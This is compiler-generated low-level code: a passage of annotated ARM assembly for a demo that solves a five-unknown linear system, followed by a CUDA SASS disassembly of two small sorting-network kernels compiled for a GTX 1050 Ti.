@ args = 0, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
cmp r3, #0
ble .L23                         @ n <= 0: nothing to do, leaf return
push {r4, r5, r6, r7, r8, lr}
sub sp, sp, #8                   @ slot for solve_xi's 5th (stack) argument
mov r5, r3                       @ r5 = n
mov r8, r2                       @ r8 = x
mov r7, r1                       @ r7 = b
mov r6, r0                       @ r6 = a
movs r4, #0                      @ i = 0
.L18:
mov r3, r4                       @ pass i
str r5, [sp]                     @ pass n on the stack
mov r0, r6
mov r1, r7
mov r2, r8
adds r4, r4, #1                  @ i++ (before the call; r4 is callee-saved)
bl solve_xi                      @ solve_xi(a, b, x, i, n)
cmp r4, r5
bne .L18                         @ loop while i < n
add sp, sp, #8
@ sp needed
pop {r4, r5, r6, r7, r8, pc}
.L23:
bx lr                            @ early-out path never built a frame
.size runtime_solve, .-runtime_solve
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
@ -----------------------------------------------------------------------
@ main -- demo driver for the solver.
@ Copies a 5x5 constant matrix (.LC0, 200 bytes) and a 5-entry constant
@ vector (.LC1, 40 bytes at .LANCHOR0+200) onto the stack, solves the
@ five unknowns one by one via solve_xi, then prints them with printf.
@ Stack layout (after sub sp, #316): b at sp+32, x at sp+72, A at sp+112;
@ sp+0..sp+31 is the outgoing-argument area for printf.
@ Returns 0.
@ -----------------------------------------------------------------------
main:
@ args = 0, pretend = 0, frame = 280
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
movw r1, #:lower16:.LANCHOR0     @ r1 = &.LC0 (matrix constants)
ldr r6, .L28                     @ r6 = .LANCHOR0+200 = &.LC1 (vector constants)
sub sp, sp, #316
movt r1, #:upper16:.LANCHOR0
movs r2, #200                    @ 200 bytes = 25 doubles = 5x5 matrix
add r0, sp, #112                 @ dst: local matrix A
add r5, sp, #32                  @ r5 = local vector b
bl memcpy                        @ A = .LC0
ldmia r6!, {r0, r1, r2, r3}      @ inline 40-byte copy: b = .LC1 ...
movs r4, #0                      @ i = 0
movs r7, #5                      @ n = 5
stmia r5!, {r0, r1, r2, r3}      @ ... 16 bytes
ldmia r6!, {r0, r1, r2, r3}
stmia r5!, {r0, r1, r2, r3}      @ ... 16 bytes
ldmia r6, {r0, r1}
stmia r5, {r0, r1}               @ ... final 8 bytes (40 total)
.L25:
mov r3, r4                       @ pass i
str r7, [sp]                     @ pass n = 5 on the stack
add r0, sp, #112                 @ A
add r1, sp, #32                  @ b
add r2, sp, #72                  @ x
adds r4, r4, #1
bl solve_xi                      @ fills x[i]
cmp r4, #5
bne .L25
ldrd r10, [sp, #80]              @ r10:fp = x[1]
movw r0, #:lower16:.LC2          @ r0 = format string
ldrd r8, [sp, #88]               @ r8:r9 = x[2]
movt r0, #:upper16:.LC2
ldrd r6, [sp, #96]               @ r6:r7 = x[3]
ldrd r4, [sp, #104]              @ r4:r5 = x[4]
ldrd r2, [sp, #72]               @ r2:r3 = x[0] -- first double arg in regs (AAPCS base)
strd r10, [sp]                   @ x[1]..x[4] go in the outgoing stack slots
strd r8, [sp, #8]
strd r6, [sp, #16]
strd r4, [sp, #24]
bl printf                        @ printf("%f, %f, %f, %f, %f\n", x0..x4)
movs r0, #0                      @ return 0
add sp, sp, #316
@ sp needed
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.L29:
.align 2
.L28:
.word .LANCHOR0+200              @ literal-pool address of .LC1
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
@ 25 IEEE-754 doubles encoded as little-endian word pairs (low word,
@ high word). main memcpy's these 200 bytes into its local matrix
@ buffer, so this is presumably the 5x5 system matrix A -- TODO confirm
@ the values against exp_runtime.c.
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
@ 5 IEEE-754 doubles (40 bytes, located at .LANCHOR0+200); main copies
@ them into its local vector buffer -- presumably the right-hand-side
@ vector b of the system.
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
@ printf format used by main for the five solution values.
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 320,714
|
exp/cuda/GTX1050Ti/benchmark.s
|
Fatbin elf code:
================
arch = sm_61
code version = [1,7]
producer = <unknown>
host = linux
compile_size = 64bit
code for sm_61
Fatbin elf code:
================
arch = sm_61
code version = [1,7]
producer = <unknown>
host = linux
compile_size = 64bit
code for sm_61
Function : _Z9nano_sortPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { IADD32I R1, R1, -0x18 ; /* 0x1c0ffffffe870101 */
/*0018*/ S2R R16, SR_CTAID.X }
/* 0xf0c8000002570010 */
/* 0x001ffc00e62007f0 */
/*0028*/ { MOV R23, RZ ; /* 0x5c9807800ff70017 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ MOV32I R0, 0xffffff02 ; /* 0x010ffffff027f000 */
/* 0x001fd842fec20ff1 */
/*0048*/ XMAD.MRG R3, R16.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000271003 */
/*0050*/ XMAD R2, R16.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000271002 */
/*0058*/ XMAD.PSL.CBCC R16, R16.H1, R3.H1, R2 ; /* 0x5b30011800371010 */
/* 0x081fc400fc2007e6 */
/*0068*/ MOV R3, R16 ; /* 0x5c98078001070003 */
/*0070*/ SHR.U32 R2, R3, 0x1e ; /* 0x3828000001e70302 */
/*0078*/ IADD32I R8, R3.reuse, 0x1 ; /* 0x1c00000000170308 */
/* 0x001f8400fe8007e1 */
/*0088*/ ISCADD R6.CC, R3, c[0x0][0x140], 0x2 ; /* 0x4c18810005070306 */
/*0090*/ IADD32I R17, R3, 0x2 ; /* 0x1c00000000270311 */
/*0098*/ SHR.U32 R4, R8, 0x1e ; /* 0x3828000001e70804 */
/* 0x001ec400fe0007f2 */
/*00a8*/ IADD.X R7, R2, c[0x0][0x144] ; /* 0x4c10080005170207 */
/*00b0*/ { ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*00b8*/ LDG.E R7, [R6] }
/* 0xeed4200000070607 */
/* 0x001fc000fe4007e5 */
/*00c8*/ SHR.U32 R2, R17, 0x1e ; /* 0x3828000001e71102 */
/*00d0*/ IADD.X R9, R4, c[0x0][0x144] ; /* 0x4c10080005170409 */
/*00d8*/ { ISCADD R4.CC, R17, c[0x0][0x140], 0x2 ; /* 0x4c18810005071104 */
/* 0x001ec800fe0007f6 */
/*00e8*/ LDG.E R20, [R8] }
/* 0xeed4200000070814 */
/*00f0*/ { IADD.X R5, R2, c[0x0][0x144] ; /* 0x4c10080005170205 */
/*00f8*/ LDG.E R2, [R8] }
/* 0xeed4200000070802 */
/* 0x081fc000f6c007f0 */
/*0108*/ { IADD32I R12, R3, 0x3 ; /* 0x1c0000000037030c */
/*0110*/ LDG.E R28, [R4] }
/* 0xeed420000007041c */
/*0118*/ { SHR.U32 R3, R12.reuse, 0x1e ; /* 0x3828000001e70c03 */
/* 0x001f8800fcc000b1 */
/*0128*/ LDG.E R14, [R4] }
/* 0xeed420000007040e */
/*0130*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/*0138*/ IADD.X R13, R3, c[0x0][0x144] ; /* 0x4c1008000517030d */
/* 0x003c4400fe6007b5 */
/*0148*/ LDG.E R15, [R12] ; /* 0xeed4200000070c0f */
/*0150*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/*0158*/ F2F.F64.F32 R4, R7 ; /* 0x5ca8000000770b04 */
/* 0x003fc440fe0007f3 */
/*0168*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0170*/ { FSET.GT.AND R3, R7.reuse, R2, PT ; /* 0x5804038000270703 */
/*0178*/ STL.64 [R1], R4 }
/* 0xef55000000070104 */
/* 0x001fc4c0fe2007e1 */
/*0188*/ FSET.GT.AND R6, R7, R28, PT ; /* 0x5804038001c70706 */
/*0190*/ FSET.GE.AND R11, R2.reuse, R7.reuse, PT ; /* 0x580603800077020b */
/*0198*/ FSET.GT.AND R10, R2, R28, PT ; /* 0x5804038001c7020a */
/* 0x001fc800fe4207f1 */
/*01a8*/ FSET.GE.AND R18, R28.reuse, R7, PT ; /* 0x5806038000771c12 */
/*01b0*/ FSET.GE.AND R19, R28, R2, PT ; /* 0x5806038000271c13 */
/*01b8*/ IADD3 R6, RZ, -R6, -R3 ; /* 0x5cc601800067ff06 */
/* 0x001fc000e28007e1 */
/*01c8*/ IADD3 R11, RZ, -R10, -R11 ; /* 0x5cc6058000a7ff0b */
/*01d0*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/*01d8*/ { IADD3 R10, RZ, -R19, -R18 ; /* 0x5cc609000137ff0a */
/* 0x001c4080fe400ff1 */
/*01e8*/ STL.64 [R1+0x8], R2 }
/* 0xef55000000870102 */
/*01f0*/ LEA R21, R6, R1.reuse, 0x3 ; /* 0x5bd7018000170615 */
/*01f8*/ { F2F.F64.F32 R28, R28 ; /* 0x5ca8000001c70b1c */
/* 0x001fc080fe4007f1 */
/*0208*/ STL.64 [R21], R4 }
/* 0xef55000000071504 */
/*0210*/ LEA R11, R11, R1.reuse, 0x3 ; /* 0x5bd7018000170b0b */
/*0218*/ { LEA R10, R10, R1, 0x3 ; /* 0x5bd7018000170a0a */
/* 0x0023c460fe0007f2 */
/*0228*/ STL.64 [R11], R2 }
/* 0xef55000000070b02 */
/*0230*/ { FSET.GT.AND R19, R20.reuse, R14, PT ; /* 0x5804038000e71413 */
/*0238*/ STL.64 [R10], R28 }
/* 0xef55000000070a1c */
/* 0x181fc000fe2407f0 */
/*0248*/ { FSET.GT.AND R12, R20, R15.reuse, PT ; /* 0x5804038000f7140c */
/*0250*/ LDL.64 R6, [R1+0x8] }
/* 0xef45000000870106 */
/*0258*/ { FSET.GE.AND R18, R14.reuse, R20.reuse, PT ; /* 0x5806038001470e12 */
/* 0x001ec400fe0007b1 */
/*0268*/ LDL.64 R8, [R1] }
/* 0xef45000000070108 */
/*0270*/ { FSET.GT.AND R24, R14, R15, PT ; /* 0x5804038000f70e18 */
/*0278*/ LDL.64 R4, [R1+0x18] }
/* 0xef45000001870104 */
/* 0x001fc800fe4007e1 */
/*0288*/ FSET.GE.AND R22, R15, R20, PT ; /* 0x5806038001470f16 */
/*0290*/ FSET.GE.AND R13, R15, R14, PT ; /* 0x5806038000e70f0d */
/*0298*/ IADD3 R12, RZ, -R12, -R19 ; /* 0x5cc6098000c7ff0c */
/* 0x001fc400fe4007f2 */
/*02a8*/ IADD3 R24, RZ, -R24, -R18 ; /* 0x5cc609000187ff18 */
/*02b0*/ IADD3 R22, RZ, -R13, -R22 ; /* 0x5cc60b0000d7ff16 */
/*02b8*/ LEA R25, R12, R1, 0x3 ; /* 0x5bd7018000170c19 */
/* 0x005fd001e2000724 */
/*02c8*/ F2F.F64.F32 R12, R15 ; /* 0x5ca8000000f70b0c */
/*02d0*/ { F2F.F64.F32 R10, R20 ; /* 0x5ca8000001470b0a */
/*02d8*/ STL.64 [R1+0x10], R12 }
/* 0xef5500000107010c */
/* 0x101fc001fe800730 */
/*02e8*/ { F2F.F64.F32 R14, R14 ; /* 0x5ca8000000e70b0e */
/*02f0*/ STL.64 [R1], R10 }
/* 0xef5500000007010a */
/*02f8*/ { LEA R24, R24, R1.reuse, 0x3 ; /* 0x5bd7018000171818 */
/* 0x001fc400fe0017f1 */
/*0308*/ STL.64 [R1+0x8], R14 }
/* 0xef5500000087010e */
/*0310*/ { LEA R22, R22, R1, 0x3 ; /* 0x5bd7018000171616 */
/*0318*/ STL.64 [R25], R10 }
/* 0xef5500000007190a */
/* 0x001fc000ffa007f0 */
/*0328*/ { IADD32I R0, R0, 0x2 ; /* 0x1c00000000270000 */
/*0330*/ STL.64 [R24], R14 }
/* 0xef5500000007180e */
/*0338*/ { ISETP.NE.AND P0, PT, R0, RZ, PT ; /* 0x5b6b03800ff70007 */
/* 0x001ec400fe2007f1 */
/*0348*/ STL.64 [R22], R12 }
/* 0xef5500000007160c */
/*0350*/ LDL.64 R18, [R1+0x8] ; /* 0xef45000000870112 */
/*0358*/ LDL.64 R20, [R1] ; /* 0xef45000000070114 */
/* 0x001c7800fe6007ba */
/*0368*/ LDL.64 R2, [R1+0x18] ; /* 0xef45000001870102 */
/*0370*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0378*/ DFMA R6, R6, 2, R8 ; /* 0x3670044000070606 */
/* 0x005c7801e7c00822 */
/*0388*/ DFMA R4, R4, 3, R6 ; /* 0x3670034008070404 */
/*0390*/ F2F.F64.F32 R6, R23 ; /* 0x5ca8000001770b06 */
/*0398*/ DADD R4, R4, R6 ; /* 0x5c70000000670404 */
/* 0x003c4420e6e00f11 */
/*03a8*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*03b0*/ DFMA R20, R18, 2, R20 ; /* 0x36700a4000071214 */
/*03b8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x0020c801e3c0171e */
/*03c8*/ DFMA R2, R2, 3, R20 ; /* 0x36700a4008070202 */
/*03d0*/ DADD R2, R2, R4 ; /* 0x5c70000000470202 */
/*03d8*/ F2F.F32.F64 R23, R2 ; /* 0x5ca8000000270e17 */
/* 0x081fc402ffa00ff0 */
/*03e8*/ { MOV R3, R17 ; /* 0x5c98078001170003 */
/*03f0*/ @P0 BRA 0x70 }
/* 0xe2400fffc780000f */
/*03f8*/ SHR R0, R16.reuse, 0x1e ; /* 0x3829000001e71000 */
/* 0x001fd400fc4007e6 */
/*0408*/ ISCADD R16.CC, R16, c[0x0][0x150], 0x2 ; /* 0x4c18810005471010 */
/*0410*/ IADD.X R17, R0, c[0x0][0x154] ; /* 0x4c10080005570011 */
/*0418*/ STG.E [R16], R23 ; /* 0xeedc200000071017 */
/* 0x001f8000ffe007ff */
/*0428*/ EXIT ; /* 0xe30000000007000f */
/*0430*/ BRA 0x430 ; /* 0xe2400fffff87000f */
/*0438*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z4sortPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV32I R28, 0xffffff04 ; /* 0x010ffffff047f01c */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x005f9801fc20073f */
/*0028*/ S2R R2, SR_TID.X ; /* 0xf0c8000002170002 */
/*0030*/ XMAD.MRG R3, R0, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/*0038*/ XMAD R2, R0, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/* 0x081fc400fc2007f6 */
/*0048*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0050*/ SHL R24, R0, 0x2 ; /* 0x3848000000270018 */
/*0058*/ IADD32I R4, R0.reuse, 0x1 ; /* 0x1c00000000170004 */
/* 0x001f9400fe2007e4 */
/*0068*/ SHR.U32 R3, R0, 0x1e ; /* 0x3828000001e70003 */
/*0070*/ IADD R2.CC, R24, c[0x0][0x140] ; /* 0x4c10800005071802 */
/*0078*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fc400fe0007f2 */
/*0088*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0090*/ { ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0098*/ LDG.E R2, [R2] }
/* 0xeed4200000070202 */
/* 0x001ec400fc4007e5 */
/*00a8*/ IADD32I R27, R0, 0x2 ; /* 0x1c0000000027001b */
/*00b0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*00b8*/ LDG.E R11, [R4] ; /* 0xeed420000007040b */
/* 0x001f8800fcc207f1 */
/*00c8*/ SHR.U32 R7, R27.reuse, 0x1e ; /* 0x3828000001e71b07 */
/*00d0*/ ISCADD R6.CC, R27, c[0x0][0x140], 0x2 ; /* 0x4c18810005071b06 */
/*00d8*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/* 0x081fc400fec007b1 */
/*00e8*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*00f0*/ IADD32I R12, R0, 0x3 ; /* 0x1c0000000037000c */
/*00f8*/ SHR.U32 R8, R12.reuse, 0x1e ; /* 0x3828000001e70c08 */
/* 0x001ed400fc4007e6 */
/*0108*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/*0110*/ IADD.X R13, R8, c[0x0][0x144] ; /* 0x4c1008000517080d */
/*0118*/ LDG.E R14, [R12] ; /* 0xeed4200000070c0e */
/* 0x001c4480fe2007f3 */
/*0128*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0130*/ FSETP.GT.AND P0, PT, R2, R11.reuse, PT ; /* 0x5bb4038000b70207 */
/*0138*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/* 0x001c8c00fe600715 */
/*0148*/ F2F.F64.F32 R4, R11 ; /* 0x5ca8000000b70b04 */
/*0150*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0158*/ F2F.F64.F32 R6, R10 ; /* 0x5ca8000000a70b06 */
/* 0x001fd400fe200ff1 */
/*0168*/ SEL R8, R2, R4, P0 ; /* 0x5ca0000000470208 */
/*0170*/ SEL R9, R3, R5, P0 ; /* 0x5ca0000000570309 */
/*0178*/ FSETP.GT.AND P2, PT, R11, R10, PT ; /* 0x5bb4038000a70b17 */
/* 0x001fa800fe201711 */
/*0188*/ DSETP.GT.AND P1, PT, R8, R6, PT ; /* 0x5b8403800067080f */
/*0190*/ SEL R10, R4, R2, P0 ; /* 0x5ca000000027040a */
/*0198*/ SEL R11, R5, R3, P0 ; /* 0x5ca000000037050b */
/* 0x001fc400fe210731 */
/*01a8*/ F2F.F64.F32 R2, R14 ; /* 0x5ca8000000e70b02 */
/*01b0*/ SEL R12, R4, R6, P2 ; /* 0x5ca001000067040c */
/*01b8*/ SEL R13, R5, R7, P2 ; /* 0x5ca001000077050d */
/* 0x005c0800fe800ff1 */
/*01c8*/ SEL R8, R6, R8, P1 ; /* 0x5ca0008000870608 */
/*01d0*/ SEL R9, R7, R9, P1 ; /* 0x5ca0008000970709 */
/*01d8*/ DSETP.GT.AND P1, PT, R12, R2, PT ; /* 0x5b84038000270c0f */
/* 0x001fec00fe200731 */
/*01e8*/ DSETP.GT.AND P0, PT, R10, R8, PT ; /* 0x5b84038000870a07 */
/*01f0*/ SEL R6, R6, R4, P2 ; /* 0x5ca0010000470606 */
/*01f8*/ SEL R7, R7, R5, P2 ; /* 0x5ca0010000570707 */
/* 0x005f8400fe200ff1 */
/*0208*/ SEL R12, R2, R12, P1 ; /* 0x5ca0008000c7020c */
/*0210*/ SEL R13, R3, R13, P1 ; /* 0x5ca0008000d7030d */
/*0218*/ SEL R2, R10, R8, P0 ; /* 0x5ca0000000870a02 */
/* 0x001fc800fe2007f1 */
/*0228*/ SEL R4, R8, R10, P0 ; /* 0x5ca0000000a70804 */
/*0230*/ SEL R3, R11, R9, P0 ; /* 0x5ca0000000970b03 */
/*0238*/ SEL R5, R9, R11, P0 ; /* 0x5ca0000000b70905 */
/* 0x005c8c00e7000714 */
/*0248*/ DSETP.GT.AND P0, PT, R6, R12, PT ; /* 0x5b84038000c70607 */
/*0250*/ DFMA R2, R2, 2, R4 ; /* 0x3670024000070202 */
/*0258*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/* 0x001fcc00fe200ff1 */
/*0268*/ SEL R4, R6, R12, P0 ; /* 0x5ca0000000c70604 */
/*0270*/ SEL R5, R7, R13, P0 ; /* 0x5ca0000000d70705 */
/*0278*/ SEL R6, R12, R6, P0 ; /* 0x5ca0000000670c06 */
/* 0x001cc400fec01711 */
/*0288*/ DADD R2, RZ, R2 ; /* 0x5c7000000027ff02 */
/*0290*/ SEL R7, R13, R7, P0 ; /* 0x5ca0000000770d07 */
/*0298*/ DFMA R4, R4, 2, R6 ; /* 0x3670034000070404 */
/* 0x003cf802e6200f07 */
/*02a8*/ F2F.F32.F64 R2, R2 ; /* 0x5ca8000000270e02 */
/*02b0*/ DADD R4, R4, +QNAN ; /* 0x3870007ff8070404 */
/*02b8*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/* 0x003f84010700171e */
/*02c8*/ DADD R2, R4, R2 ; /* 0x5c70000000270402 */
/*02d0*/ F2F.F32.F64 R20, R2 ; /* 0x5ca8000000270e14 */
/*02d8*/ SHR.U32 R2, R27, 0x1e ; /* 0x3828000001e71b02 */
/* 0x001f8400fea207f1 */
/*02e8*/ IADD32I R8, R27.reuse, 0x1 ; /* 0x1c00000000171b08 */
/*02f0*/ ISCADD R6.CC, R27, c[0x0][0x140], 0x2 ; /* 0x4c18810005071b06 */
/*02f8*/ SHR.U32 R3, R8, 0x1e ; /* 0x3828000001e70803 */
/* 0x001ec400fe0007f2 */
/*0308*/ IADD.X R7, R2, c[0x0][0x144] ; /* 0x4c10080005170207 */
/*0310*/ { ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*0318*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/* 0x081fc000fe4007e5 */
/*0328*/ IADD32I R2, R27, 0x2 ; /* 0x1c00000000271b02 */
/*0330*/ IADD.X R9, R3, c[0x0][0x144] ; /* 0x4c10080005170309 */
/*0338*/ { SHR.U32 R3, R2.reuse, 0x1e ; /* 0x3828000001e70203 */
/* 0x001f9400fc2007b1 */
/*0348*/ LDG.E R9, [R8] }
/* 0xeed4200000070809 */
/*0350*/ ISCADD R2.CC, R2, c[0x0][0x140], 0x2 ; /* 0x4c18810005070202 */
/*0358*/ IADD32I R10, R27, 0x3 ; /* 0x1c00000000371b0a */
/* 0x081fc400162007e2 */
/*0368*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0370*/ LDG.E R4, [R2] ; /* 0xeed4200000070204 */
/*0378*/ SHR.U32 R5, R10.reuse, 0x1e ; /* 0x3828000001e70a05 */
/* 0x001ec400fc4007e6 */
/*0388*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*0390*/ IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0398*/ LDG.E R5, [R10] ; /* 0xeed4200000070a05 */
/* 0x001f9840fe2007f6 */
/*03a8*/ IADD32I R16, R27, 0x4 ; /* 0x1c00000000471b10 */
/*03b0*/ SHR.U32 R12, R16.reuse, 0x1e ; /* 0x3828000001e7100c */
/*03b8*/ ISCADD R16.CC, R16, c[0x0][0x140], 0x2 ; /* 0x4c18810005071010 */
/* 0x001fd800f62007e2 */
/*03c8*/ IADD.X R17, R12, c[0x0][0x144] ; /* 0x4c10080005170c11 */
/*03d0*/ LDG.E R16, [R16] ; /* 0xeed4200000071010 */
/*03d8*/ IADD32I R22, R27, 0x5 ; /* 0x1c00000000571b16 */
/* 0x001f8800fcc20ff1 */
/*03e8*/ SHR.U32 R2, R22.reuse, 0x1e ; /* 0x3828000001e71602 */
/*03f0*/ ISCADD R22.CC, R22, c[0x0][0x140], 0x2 ; /* 0x4c18810005071616 */
/*03f8*/ IADD.X R23, R2, c[0x0][0x144] ; /* 0x4c10080005170217 */
/* 0x001fcc02e28007b1 */
/*0408*/ LDG.E R22, [R22] ; /* 0xeed4200000071616 */
/*0410*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0418*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/* 0x001ca080fe200731 */
/*0428*/ F2F.F64.F32 R12, R6 ; /* 0x5ca8000000670b0c */
/*0430*/ FSETP.GT.AND P0, PT, R6, R9.reuse, PT ; /* 0x5bb4038000970607 */
/*0438*/ F2F.F64.F32 R2, R9 ; /* 0x5ca8000000970b02 */
/* 0x001d4480fe2007f3 */
/*0448*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/*0450*/ FSETP.GT.AND P2, PT, R9, R4.reuse, PT ; /* 0x5bb4038000470917 */
/*0458*/ F2F.F64.F32 R36, R4 ; /* 0x5ca8000000470b24 */
/* 0x001fcc00fca017f1 */
/*0468*/ SEL R6, R12, R2, P0 ; /* 0x5ca0000000270c06 */
/*0470*/ SEL R7, R13, R3, P0 ; /* 0x5ca0000000370d07 */
/*0478*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x081fc404ea200731 */
/*0488*/ F2F.F64.F32 R14, R5 ; /* 0x5ca8000000570b0e */
/*0490*/ DSETP.GT.AND P1, PT, R6, R36, PT ; /* 0x5b8403800247060f */
/*0498*/ SEL R8, R2.reuse, R36, P2 ; /* 0x5ca0010002470208 */
/* 0x005cc400fca007f1 */
/*04a8*/ SEL R9, R3, R37, P2 ; /* 0x5ca0010002570309 */
/*04b0*/ SEL R32, R2, R12, P0 ; /* 0x5ca0000000c70220 */
/*04b8*/ DSETP.GT.AND P3, PT, R8, R14, PT ; /* 0x5b84038000e7081f */
/* 0x089fc400fea007f1 */
/*04c8*/ SEL R33, R3, R13, P0 ; /* 0x5ca0000000d70321 */
/*04d0*/ FSETP.GT.AND P0, PT, R4, R5, PT ; /* 0x5bb4038000570407 */
/*04d8*/ SEL R18, R36.reuse, R6, P1 ; /* 0x5ca0008000672412 */
/* 0x001fd000fc2007f1 */
/*04e8*/ SEL R19, R37, R7, P1 ; /* 0x5ca0008000772513 */
/*04f0*/ SEL R2, R36, R2, P2 ; /* 0x5ca0010000272402 */
/*04f8*/ SEL R3, R37, R3, P2 ; /* 0x5ca0010000372503 */
/* 0x001fa802fe200751 */
/*0508*/ DSETP.GT.AND P2, PT, R32, R18, PT ; /* 0x5b84038001272017 */
/*0510*/ SEL R12, R14, R8, P3 ; /* 0x5ca0018000870e0c */
/*0518*/ SEL R13, R15, R9, P3 ; /* 0x5ca0018000970f0d */
/* 0x001fc400e62007f3 */
/*0528*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0530*/ F2F.F64.F32 R8, R16 ; /* 0x5ca8000001070b08 */
/*0538*/ SEL R6, R36, R14, P0 ; /* 0x5ca0000000e72406 */
/* 0x001f9000ee2007f1 */
/*0548*/ SEL R7, R37, R15, P0 ; /* 0x5ca0000000f72507 */
/*0550*/ DSETP.GT.AND P1, PT, R2, R12, PT ; /* 0x5b84038000c7020f */
/*0558*/ SEL R10, R14, R36, P0 ; /* 0x5ca0000002470e0a */
/* 0x001fc400fe201731 */
/*0568*/ DSETP.GT.AND P3, PT, R6, R8, PT ; /* 0x5b8403800087061f */
/*0570*/ SEL R11, R15, R37, P0 ; /* 0x5ca0000002570f0b */
/*0578*/ FSETP.GT.AND P0, PT, R5, R16, PT ; /* 0x5bb4038001070507 */
/* 0x001f8400fe2027f1 */
/*0588*/ SEL R4, R32, R18, P2 ; /* 0x5ca0010001272004 */
/*0590*/ SEL R5, R33, R19, P2 ; /* 0x5ca0010001372105 */
/*0598*/ SEL R18, R18, R32, P2 ; /* 0x5ca0010002071212 */
/* 0x0009c808fe4007f4 */
/*05a8*/ SEL R19, R19, R33, P2 ; /* 0x5ca0010002171313 */
/*05b0*/ SEL R30, R12, R2, P1 ; /* 0x5ca0008000270c1e */
/*05b8*/ DFMA R18, R4, 2, R18 ; /* 0x3670094000070412 */
/* 0x005fc400fe2027e1 */
/*05c8*/ SEL R4, R2, R12, P1 ; /* 0x5ca0008000c70204 */
/*05d0*/ IADD32I R12, R27, 0x6 ; /* 0x1c00000000671b0c */
/*05d8*/ SEL R36, R8, R6, P3 ; /* 0x5ca0018000670824 */
/* 0x001fc440fe2007f4 */
/*05e8*/ SEL R37, R9, R7, P3 ; /* 0x5ca0018000770925 */
/*05f0*/ SHR.U32 R2, R12.reuse, 0x1e ; /* 0x3828000001e70c02 */
/*05f8*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/* 0x001fc400fe200721 */
